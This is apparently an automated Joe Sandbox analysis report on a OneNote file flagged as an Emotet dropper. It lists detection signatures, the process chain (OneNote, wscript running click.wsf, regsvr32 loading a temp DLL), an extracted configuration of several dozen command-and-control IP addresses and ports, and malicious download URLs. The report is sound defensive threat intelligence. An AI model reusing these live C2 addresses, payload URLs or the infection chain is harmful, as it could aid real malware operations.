Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OMICS.one

Overview

General Information

Sample Name:OMICS.one
Analysis ID:828486
MD5:cee0905efea3357f3dc9902754e5d47a
SHA1:693fdea99a495b339d8dd372b759f370cf7f1b7a
SHA256:d72079bdae7c59361f934bf92ec1a53875008113541db11124d167cc2eb69b32
Tags:one
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 5728 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 5928 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 5980 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 6048 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5tf2IdgAHAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ff1AdgAvAIg="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OMICS.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
    • 0xeda:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0xffa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x58a:$jsp4: public
    • 0xbca:$jsp4: public
    • 0x244:$asp_payload11: wscript.shell
    • 0x1f04:$asp_payload11: wscript.shell
    • 0x228:$asp_multi_payload_one1: createobject
    • 0x98e:$asp_multi_payload_one1: createobject
    • 0xcc6:$asp_multi_payload_one1: createobject
    • 0x1aec:$asp_multi_payload_one1: createobject
    • 0x1bda:$asp_multi_payload_one1: createobject
    • 0x1c52:$asp_multi_payload_one1: createobject
    • 0x1cac:$asp_multi_payload_one1: createobject
    • 0x1ee8:$asp_multi_payload_one1: createobject
    • 0xc6c:$asp_multi_payload_one3: .run
    • 0x228:$asp_multi_payload_four1: createobject
    • 0x98e:$asp_multi_payload_four1: createobject
    • 0xcc6:$asp_multi_payload_four1: createobject
    • 0x1aec:$asp_multi_payload_four1: createobject
    • 0x1bda:$asp_multi_payload_four1: createobject
    • 0x1c52:$asp_multi_payload_four1: createobject
    00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
    • 0xf6:$asp_gen_obf1: "+"
    • 0x126:$asp_gen_obf1: "+"
    • 0x1db6:$asp_gen_obf1: "+"
    • 0x1de6:$asp_gen_obf1: "+"
    • 0xeda:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0xffa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x58a:$jsp4: public
    • 0xbca:$jsp4: public
    • 0x738:$asp_input1: request
    • 0x77a:$asp_input1: request
    • 0x890:$asp_input1: request
    • 0x1bca:$asp_input1: request
    • 0x244:$asp_payload11: wscript.shell
    • 0x1f04:$asp_payload11: wscript.shell
    • 0x228:$asp_multi_payload_one1: createobject
    • 0x98e:$asp_multi_payload_one1: createobject
    • 0xcc6:$asp_multi_payload_one1: createobject
    • 0x1aec:$asp_multi_payload_one1: createobject
    • 0x1bda:$asp_multi_payload_one1: createobject
    • 0x1c52:$asp_multi_payload_one1: createobject
    • 0x1cac:$asp_multi_payload_one1: createobject
    00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000001.00000002.404361294.0000000005166000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
        • 0x1abe:$asp_gen_obf1: "+"
        • 0x1aee:$asp_gen_obf1: "+"
        • 0x168a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
        • 0x202:$jsp4: public
        • 0x842:$jsp4: public
        • 0x1f52:$jsp4: public
        • 0x3b0:$asp_input1: request
        • 0x3f2:$asp_input1: request
        • 0x508:$asp_input1: request
        • 0x18d2:$asp_input1: request
        • 0x1c0c:$asp_payload11: wscript.shell
        • 0x606:$asp_multi_payload_one1: createobject
        • 0x17f4:$asp_multi_payload_one1: createobject
        • 0x18e2:$asp_multi_payload_one1: createobject
        • 0x195a:$asp_multi_payload_one1: createobject
        • 0x19b4:$asp_multi_payload_one1: createobject
        • 0x1bf0:$asp_multi_payload_one1: createobject
        • 0x8e4:$asp_multi_payload_one3: .run
        • 0x606:$asp_multi_payload_four1: createobject
        • 0x17f4:$asp_multi_payload_four1: createobject
        • 0x18e2:$asp_multi_payload_four1: createobject
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.regsvr32.exe.bc0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          4.2.regsvr32.exe.bc0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            3.2.regsvr32.exe.dd0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.regsvr32.exe.dd0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                Sigma Signatures

                Malware Analysis System Evasion

                barindex
                Sigma detected: Run temp file via regsvr32
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5928, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll, ProcessId: 5980, ProcessName: regsvr32.exe

                Snort Signatures

                Timestamp:192.168.2.4104.168.155.1434969680802404302 03/17/23-09:07:50.440401
                SID:2404302
                Source Port:49696
                Destination Port:8080
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.491.121.146.474968680802404344 03/17/23-09:07:07.082827
                SID:2404344
                Source Port:49686
                Destination Port:8080
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4182.162.143.56496894432404312 03/17/23-09:07:23.162928
                SID:2404312
                Source Port:49689
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.466.228.32.314968870802404330 03/17/23-09:07:17.980118
                SID:2404330
                Source Port:49688
                Destination Port:7080
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4167.172.199.1654969180802404308 03/17/23-09:07:36.723536
                SID:2404308
                Source Port:49691
                Destination Port:8080
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: OMICS.oneReversingLabs: Detection: 30%
                Source: OMICS.oneVirustotal: Detection: 40%Perma Link
                Antivirus detection for URL or domain
                Source: https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://104.168.155.143:8080/lAvira URL Cloud: Label: malware
                Source: https://159.89.202.34/Avira URL Cloud: Label: malware
                Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
                Source: https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11Avira URL Cloud: Label: malware
                Source: https://163.44.196.120:8080/Avira URL Cloud: Label: malware
                Source: https://66.228.32.31:7080/QAvira URL Cloud: Label: malware
                Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                Source: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://www.gomespontes.com.br/logs/pd/vMAvira URL Cloud: Label: malware
                Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z=Avira URL Cloud: Label: malware
                Source: https://91.121.146.47:8080/Avira URL Cloud: Label: malware
                Source: https://www.gomespontes.com.br/logs/pd/0Avira URL Cloud: Label: malware
                Source: https://167.172.199.165:8080/Avira URL Cloud: Label: malware
                Source: https://159.89.202.34/qAvira URL Cloud: Label: malware
                Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
                Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
                Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMAvira URL Cloud: Label: malware
                Source: https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&Avira URL Cloud: Label: malware
                Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
                Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0Avira URL Cloud: Label: malware
                Source: https://penshorn.org/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMAvira URL Cloud: Label: malware
                Source: https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/?Avira URL Cloud: Label: malware
                Source: https://187.63.160.88:80/Avira URL Cloud: Label: malware
                Source: http://softwareulike.com/cWIYxWMPkK/yMAvira URL Cloud: Label: malware
                Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/Avira URL Cloud: Label: malware
                Source: https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://penshorn.org/admin/Ses8712iGR8du/RAvira URL Cloud: Label: malware
                Source: https://penshorn.org/admin/Ses8712iGR8du/cw3Avira URL Cloud: Label: malware
                Source: https://104.168.155.143:8080/(SIAvira URL Cloud: Label: malware
                Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6HAvira URL Cloud: Label: malware
                Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
                Source: https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Source: https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0Avira URL Cloud: Label: malware
                Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/Avira URL Cloud: Label: malware
                Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllBAvira URL Cloud: Label: malware
                Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMAvira URL Cloud: Label: malware
                Source: https://159.89.202.34/wnAvira URL Cloud: Label: malware
                Source: https://penshorn.org:443/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
                Source: https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D=Avira URL Cloud: Label: malware
                Source: https://164.90.222.65/0Avira URL Cloud: Label: malware
                Source: https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: penshorn.orgVirustotal: Detection: 10%Perma Link
                Source: http://softwareulike.com/cWIYxWMPkK/Virustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllReversingLabs: Detection: 58%
                Source: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)ReversingLabs: Detection: 58%
                Source: 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5tf2IdgAHAI4=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ff1AdgAvAIg="]}
                Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49685 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.4:49689 version: TLS 1.2
                Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49689 -> 182.162.143.56:443
                Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49686 -> 91.121.146.47:8080
                Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49688 -> 66.228.32.31:7080
                Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49691 -> 167.172.199.165:8080
                Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49696 -> 104.168.155.143:8080
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 91.121.146.47:8080
                Source: Malware configuration extractorIPs: 66.228.32.31:7080
                Source: Malware configuration extractorIPs: 182.162.143.56:443
                Source: Malware configuration extractorIPs: 187.63.160.88:80
                Source: Malware configuration extractorIPs: 167.172.199.165:8080
                Source: Malware configuration extractorIPs: 164.90.222.65:443
                Source: Malware configuration extractorIPs: 104.168.155.143:8080
                Source: Malware configuration extractorIPs: 163.44.196.120:8080
                Source: Malware configuration extractorIPs: 160.16.142.56:8080
                Source: Malware configuration extractorIPs: 159.89.202.34:443
                Source: Malware configuration extractorIPs: 159.65.88.10:8080
                Source: Malware configuration extractorIPs: 186.194.240.217:443
                Source: Malware configuration extractorIPs: 149.56.131.28:8080
                Source: Malware configuration extractorIPs: 72.15.201.15:8080
                Source: Malware configuration extractorIPs: 1.234.2.232:8080
                Source: Malware configuration extractorIPs: 82.223.21.224:8080
                Source: Malware configuration extractorIPs: 206.189.28.199:8080
                Source: Malware configuration extractorIPs: 169.57.156.166:8080
                Source: Malware configuration extractorIPs: 107.170.39.149:8080
                Source: Malware configuration extractorIPs: 103.43.75.120:443
                Source: Malware configuration extractorIPs: 91.207.28.33:8080
                Source: Malware configuration extractorIPs: 213.239.212.5:443
                Source: Malware configuration extractorIPs: 45.235.8.30:8080
                Source: Malware configuration extractorIPs: 119.59.103.152:8080
                Source: Malware configuration extractorIPs: 164.68.99.3:8080
                Source: Malware configuration extractorIPs: 95.217.221.146:8080
                Source: Malware configuration extractorIPs: 153.126.146.25:7080
                Source: Malware configuration extractorIPs: 197.242.150.244:8080
                Source: Malware configuration extractorIPs: 202.129.205.3:8080
                Source: Malware configuration extractorIPs: 103.132.242.26:8080
                Source: Malware configuration extractorIPs: 139.59.126.41:443
                Source: Malware configuration extractorIPs: 110.232.117.186:8080
                Source: Malware configuration extractorIPs: 183.111.227.137:8080
                Source: Malware configuration extractorIPs: 5.135.159.50:443
                Source: Malware configuration extractorIPs: 201.94.166.162:443
                Source: Malware configuration extractorIPs: 103.75.201.2:443
                Source: Malware configuration extractorIPs: 79.137.35.198:8080
                Source: Malware configuration extractorIPs: 172.105.226.75:8080
                Source: Malware configuration extractorIPs: 94.23.45.86:4143
                Source: Malware configuration extractorIPs: 115.68.227.76:8080
                Source: Malware configuration extractorIPs: 153.92.5.27:8080
                Source: Malware configuration extractorIPs: 167.172.253.162:8080
                Source: Malware configuration extractorIPs: 188.44.20.25:443
                Source: Malware configuration extractorIPs: 147.139.166.154:8080
                Source: Malware configuration extractorIPs: 129.232.188.93:443
                Source: Malware configuration extractorIPs: 173.212.193.249:8080
                Source: Malware configuration extractorIPs: 185.4.135.165:8080
                Source: Malware configuration extractorIPs: 45.176.232.124:443
                Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
                Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                Source: global trafficHTTP traffic detected: POST /ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
                Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                Source: global trafficTCP traffic: 192.168.2.4:49686 -> 91.121.146.47:8080
                Source: global trafficTCP traffic: 192.168.2.4:49688 -> 66.228.32.31:7080
                Source: global trafficTCP traffic: 192.168.2.4:49691 -> 167.172.199.165:8080
                Source: global trafficTCP traffic: 192.168.2.4:49696 -> 104.168.155.143:8080
                Source: global trafficTCP traffic: 192.168.2.4:49697 -> 163.44.196.120:8080
                Source: global trafficTCP traffic: 192.168.2.4:49698 -> 160.16.142.56:8080
                Source: unknownNetwork traffic detected: IP country count 17
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
